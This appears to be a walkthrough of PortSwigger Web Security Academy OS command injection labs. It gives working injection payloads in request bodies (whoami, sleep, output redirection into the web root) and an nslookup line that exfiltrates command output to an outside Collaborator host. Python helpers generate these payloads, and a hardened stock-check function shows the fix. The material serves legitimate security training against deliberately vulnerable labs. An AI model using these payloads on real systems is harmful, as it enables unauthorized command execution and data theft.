WebSecurityAcademy (PortSwigger) – OS command injection

Walk-through of the OS command injection labs on PortSwigger Web Security Academy.

The payloads below use the Hackvertor extension's <@urlencode>...<@/urlencode> tags to URL-encode the injected part of the request body; Hackvertor applies the encoding when the request is sent. Without it, an & in the payload would end the parameter and a + would be decoded as a space, so the shell would never see the intended command.

Apprentice – OS command injection, simple case

Click Check stock on a product page and inspect the request:

POST /product/stock HTTP/1.1
...

productId=1&storeId=1

Send the request to the Repeater module.

Inject a command in the storeId parameter

The application passes storeId to a shell command, so a shell separator followed by a second command runs that command as well. Modify the request in the Repeater module with this payload:

productId=1&storeId=<@urlencode>1 && whoami<@/urlencode>

The response now contains the output of whoami, the name of the user the application runs as, which solves the lab.

Other payloads that work:

productId=1&storeId=<@urlencode>1 | whoami<@/urlencode>

With &&, whoami runs only if the stock command exits successfully and its output is appended to the normal response; with |, the stock command's output is piped into whoami (which ignores it), so only the whoami output comes back. A ; separator also works, since it runs the second command unconditionally.
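The following is an added example, not the lab's own code, showing why "1 && whoami" and "1 | whoami" work and how the stock check should be written instead. The page does not show the lab's real back-end program, so echo stands in for it here (hypothetical), and "echo INJECTED" plays the part of whoami so the output is deterministic.

```python
# Added example (not the lab's code): vulnerable shell-out beside its hardened form.
# STOCK_PROGRAM is a hypothetical stand-in for the lab's stock-lookup program.
import re
import subprocess

STOCK_PROGRAM = ["echo", "stock-for"]  # just echoes its arguments


def check_stock_vulnerable(product_id: str, store_id: str) -> str:
    """Builds ONE command string and hands it to /bin/sh (shell=True).
    The shell parses the user-supplied text, so && | ; ` and $() inside
    store_id act as command separators instead of data."""
    command = f"{' '.join(STOCK_PROGRAM)} {product_id} {store_id}"
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def is_plain_id(value: str) -> bool:
    """Allow-list check: the ids are short integers, nothing else gets through."""
    return re.fullmatch(r"[0-9]{1,9}", value) is not None


def check_stock_hardened(product_id: str, store_id: str) -> str:
    """Two independent defences: validate against an allow-list, and never let a
    shell see the value (argv list, shell=False). Either alone stops this payload;
    using both survives a mistake in the other."""
    if not (is_plain_id(product_id) and is_plain_id(store_id)):
        raise ValueError("productId and storeId must be numeric")
    argv = [*STOCK_PROGRAM, product_id, store_id]  # each id is exactly one argument
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(repr(check_stock_vulnerable("1", "1 && echo INJECTED")))  # output appended
    print(repr(check_stock_vulnerable("1", "1 | echo INJECTED")))   # output replaced
    print(repr(check_stock_hardened("1", "1")))
    try:
        check_stock_hardened("1", "1 && echo INJECTED")
    except ValueError as exc:
        print("hardened version rejected the payload:", exc)
```

Run it on any POSIX system with Python 3.7 or later: the && variant prints the normal stock line followed by INJECTED, the | variant prints only INJECTED, and the hardened function refuses the non-numeric storeId before any process is started.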

Practitioner – Blind OS command injection with time delays

Click on the Submit feedback link. Enter any feedback and inspect the request.

POST /feedback/submit HTTP/1.1
...

csrf=UkOO8nQrtWJkS2G2TcIYpJSotG6RYFnK&name=whatever&email=whatever%40example.com&subject=whatever&message=whatever

Send the request to the Repeater module.

Inject a command in the email parameter

The application does not return any command output, so use a delay that can be observed in the response time. Modify the request in the Repeater module with one of these payloads (the semicolons before and after the command terminate whatever command the application builds around the email value; use the csrf token from your own session):

csrf=UkOO8nQrtWJkS2G2TcIYpJSotG6RYFnK&name=test&email=<@urlencode>; ping -c 10 127.0.0.1; <@/urlencode>&subject=test&message=whatever
csrf=UkOO8nQrtWJkS2G2TcIYpJSotG6RYFnK&name=test&email=<@urlencode>; sleep 10; <@/urlencode>&subject=test&message=whatever

Check the response time shown in Repeater: with the payload the response takes roughly 10 seconds, against well under a second for a normal submission, which confirms the command executed.

Practitioner – Blind OS command injection with output redirection

The lab has a writable folder, /var/www/images/, whose contents the application serves through the /image?filename= endpoint, so command output redirected into that folder can be read back over HTTP.

Click on the Submit feedback link. Enter any feedback and inspect the request.

POST /feedback/submit HTTP/1.1
...

csrf=uBVylSsu0ow53swpS6xlvARvS3ssmZbu&name=whatever&email=whatever%40a.com&subject=whatever&message=whatever

Inject a command in the email parameter

The response does not include command output, so redirect it into a file in the writable folder. Modify the request in the Repeater module with this payload (use the csrf token from your own session):

csrf=uBVylSsu0ow53swpS6xlvARvS3ssmZbu&name=whatever&email=<@urlencode>; whoami > /var/www/images/whoami.txt; <@/urlencode>&subject=whatever&message=whatever

Access the file created by the command injection

GET /image?filename=whoami.txt HTTP/1.1

The response body is the output of whoami, the name of the user the application runs as.

Practitioner – Blind OS command injection with out-of-band interaction

To solve the lab, you must use Burp Collaborator’s default public server.

Click on the Submit feedback link. Enter any feedback and inspect the request.

POST /feedback/submit HTTP/1.1
...

csrf=WLiemipQMCM32hAdtbUAIy7jLl6uYE15&name=whatever&email=whatever%40example.com&subject=whatever&message=whatever

Send the request to the Repeater module.

Inject a command in the email parameter

Click on the Collaborator tab and click on Copy to clipboard to get a Collaborator payload hostname. Modify the request in the Repeater module with this payload, replacing the hostname with your own (the one below belongs to the author's session and will not work for you):

csrf=WLiemipQMCM32hAdtbUAIy7jLl6uYE15&name=whatever&email=<@urlencode>; nslookup wtt9phrz2a46l0lc8a9v0q8yipogc70w.oastify.com; <@/urlencode>&subject=whatever&message=whatever

Click on Poll now in the Collaborator tab. The lab is solved once the Collaborator server records the DNS lookup that nslookup performed from the application server.

Practitioner – Blind OS command injection with out-of-band data exfiltration

To solve the lab, you must use Burp Collaborator’s default public server.

Click on the Submit feedback link. Enter any feedback and inspect the request.

POST /feedback/submit HTTP/1.1
...

csrf=UCrWtm65NytEPwe3YCHjw3KscZsuJaeU&name=whatever&email=whatever%40example.com&subject=whatever&message=whatever

Send the request to the Repeater module.

Inject a command in the email parameter

Click on the Collaborator tab and click on Copy to clipboard to get a Collaborator payload hostname. Modify the request in the Repeater module with this payload, replacing the hostname with your own:

csrf=UCrWtm65NytEPwe3YCHjw3KscZsuJaeU&name=whatever&email=<@urlencode>; nslookup `whoami`.gl5th1jjuuwqdkdw0u1fsa0ia9g04ssh.oastify.com; <@/urlencode>&subject=whatever&message=whatever

The backticks are shell command substitution: the shell runs whoami first and inserts its output as the leftmost label of the hostname that nslookup then resolves, so the output leaves the server inside the DNS query.

Click on Poll now in the Collaborator tab.

The Collaborator server received a DNS lookup of type A for the domain name peter-h7HHUD.gl5th1jjuuwqdkdw0u1fsa0ia9g04ssh.oastify.com. The part in front of your Collaborator hostname is the exfiltrated output.

Submit peter-h7HHUD as the answer to solve the lab (your own instance returns a different username).

This technique only carries output that forms a valid DNS label (letters, digits and hyphens, at most 63 characters); output containing spaces or other characters would need to be hex-encoded on the server first before being used as a label.
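The following is an added example, not part of the original walkthrough, for the four blind labs above. It builds the URL-encoded feedback body that the Hackvertor <@urlencode> tag produces inside Burp, shows what the server decodes it back to, and recovers the exfiltrated value from the hostname Collaborator records. The csrf token and Collaborator hostname are placeholders supplied by the caller.

```python
# Added example (not the lab's code): payload bodies for the blind feedback labs
# and extraction of the exfiltrated DNS label. Token and hostname are placeholders.
import re
from urllib.parse import parse_qs, urlencode


def feedback_body(csrf: str, email_payload: str) -> str:
    """Form body for POST /feedback/submit with the payload in the email field.
    urlencode() percent-encodes ; & ` > / and turns spaces into '+', so the
    shell metacharacters survive form parsing and reach the command line."""
    fields = {"csrf": csrf, "name": "whatever", "email": email_payload,
              "subject": "whatever", "message": "whatever"}
    return urlencode(fields)


def server_view(body: str) -> dict:
    """What the application sees after decoding the form body."""
    return {key: values[0] for key, values in parse_qs(body).items()}


def blind_payloads(collaborator_host: str) -> dict:
    """The four blind techniques used in the labs. The leading and trailing ';'
    terminate whatever command the application builds around the email value."""
    return {
        "time_delay": "; sleep 10; ",
        "output_redirection": "; whoami > /var/www/images/whoami.txt; ",
        "oob_interaction": f"; nslookup {collaborator_host}; ",
        "oob_exfiltration": f"; nslookup `whoami`.{collaborator_host}; ",
    }


def fits_dns_label(value: str) -> bool:
    """Command output only survives the DNS channel if it is a valid label:
    letters, digits and hyphens, at most 63 characters."""
    return re.fullmatch(r"[A-Za-z0-9-]{1,63}", value) is not None


def exfiltrated_label(queried_name: str, collaborator_host: str) -> str:
    """Strip the Collaborator suffix from a recorded DNS query, leaving the data
    that `whoami` substituted into the leftmost label. Case is preserved because
    the exfiltrated value may be mixed case even though DNS matching is not."""
    name = queried_name.rstrip(".")
    suffix = "." + collaborator_host.rstrip(".")
    if not name.lower().endswith(suffix.lower()):
        raise ValueError("query is not for the Collaborator payload domain")
    return name[: -len(suffix)]


if __name__ == "__main__":
    collab = "example-payload.oastify.com"  # placeholder Collaborator hostname
    for technique, payload in blind_payloads(collab).items():
        body = feedback_body("TOKEN", payload)
        print(f"{technique}: {body}")
        assert server_view(body)["email"] == payload  # round-trips intact
    seen = "peter-h7HHUD." + collab  # constructed: what Poll now would show
    print("exfiltrated:", exfiltrated_label(seen, collab))
```

The round-trip check in the main block is the point of the encoding step: the bytes the shell eventually receives are exactly the payload text, while the wire form contains no raw & or space that a form parser would misinterpret.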